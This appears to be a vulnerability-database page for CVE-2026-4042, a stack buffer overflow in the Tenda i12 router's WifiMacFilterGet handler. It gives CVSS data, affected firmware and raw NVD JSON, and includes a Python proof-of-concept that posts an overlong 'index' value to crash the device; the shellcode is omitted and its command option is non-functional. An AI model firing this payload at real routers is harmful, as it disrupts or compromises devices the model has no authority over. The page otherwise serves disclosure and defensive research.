Security Vulnerability Report
CVE-2026-4042 CVSS 8.8 HIGH

Published: 2026-03-12 15:16:34
Last Modified: 2026-04-02 20:04:42

Description

A weakness has been identified in Tenda i12 1.0.0.6(2204). The affected element is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet. This manipulation of the argument index causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:i12_firmware:1.0.0.6\(2204\):*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:i12:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda i12 1.0.0.6(2204)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-4042 PoC - Tenda i12 Stack Buffer Overflow
Affected Version: Tenda i12 1.0.0.6(2204)
Vulnerability: Stack-based buffer overflow in /goform/WifiMacFilterGet
CVSS Score: 8.8 (High)
"""

import requests
import sys
import argparse


def exploit(target_ip, target_port=80, cmd=None):
    """
    Exploit the stack buffer overflow in Tenda i12 router's WifiMacFilterGet function

    Args:
        target_ip: Target router IP address
        target_port: Target router web port (default: 80)
        cmd: Optional command to execute (for RCE)
    """
    url = f"http://{target_ip}:{target_port}/goform/WifiMacFilterGet"

    # Generate payload with excessive length to trigger overflow
    # The exact overflow length depends on the specific firmware version
    # This payload is designed to overwrite return address on the stack
    padding_length = 500  # Adjust based on testing
    nop_sled = b'\x90' * 100  # NOP sled for better shellcode placement

    # Example shellcode for MIPS architecture (Tenda routers typically use MIPS)
    shellcode = b''  # shellcode bytes omitted

    # Return address - needs to be adjusted based on firmware analysis
    return_addr = b'\x40\x00\x00\x00'  # Example return address

    # Construct the overflow payload
    payload = b'A' * padding_length + nop_sled + shellcode + return_addr

    # Send the exploit request
    data = {
        'index': payload.decode('latin-1')
    }

    try:
        print(f"[*] Sending exploit to {url}")
        print(f"[*] Payload length: {len(payload)} bytes")
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.content)} bytes")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2026-4042 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)')
    parser.add_argument('-c', '--cmd', help='Command to execute')
    args = parser.parse_args()
    exploit(args.target, args.port, args.cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4042", "sourceIdentifier": "[email protected]", "published": "2026-03-12T15:16:34.180", "lastModified": "2026-04-02T20:04:42.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Tenda i12 1.0.0.6(2204). The affected element is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet. This manipulation of the argument index causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en Tenda i12 1.0.0.6(2204). El elemento afectado es la función formWifiMacFilterGet del archivo /goform/WifiMacFilterGet. Esta manipulación del argumento index causa desbordamiento de búfer basado en pila. El ataque puede ser iniciado remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
true, "criteria": "cpe:2.3:o:tenda:i12_firmware:1.0.0.6\\(2204\\):*:*:*:*:*:*:*", "matchCriteriaId": "294C4C09-FB11-4D03-9DD0-5CEDC115974E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:i12:-:*:*:*:*:*:*:*", "matchCriteriaId": "79D3B1CC-FB4E-40F3-B175-F70F5A44C447"}]}]}], "references": [{"url": "https://github.com/Jimi-Lab/cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.350654", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.350654", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.769463", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}